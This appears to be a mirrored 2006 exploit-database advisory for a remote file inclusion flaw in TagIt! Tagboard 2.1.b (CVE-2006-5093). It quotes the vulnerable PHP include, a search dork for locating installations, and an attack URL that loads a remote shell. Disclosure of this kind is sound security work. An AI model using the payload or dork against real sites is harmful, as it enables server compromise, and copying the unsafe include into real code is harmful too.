[] NeoSense
E X P L O I T S
title author type platform port cve id

TagIt! Tagboard 2.1.b b2 - 'index.php' Remote File Inclusion

Author: Kernel-32
type: webapps
platform: php
port: 
date_added: 2006-09-27 
date_updated:  
verified: 1 
codes: OSVDB-29293;CVE-2006-5093 
tags: 
aliases:  
screenshot_url:  
application_url: 
 Tagmin C.C 2.1.B Remote File Include
########################################
+Advisory #3
+Product :Tagmin Control Center 2.1.B
+Develop: http://ds3.bbminc.net/tagit2b/
+Dork: inurl:"/tagit2b/"
+Vulnerable: Remote File Include
+Risk:High
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################
Vulnerable code:
----------------
if(isset($_GET['load']) && $_GET['load'] == "dtu" or $_GET['load'] == "tag") {
include("$page.php");
}
else {
include("tagviewer.php");
}
?>

---------------
Vulnerable:
http://site/path/index.php?page=shell

# milw0rm.com [2006-09-28]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.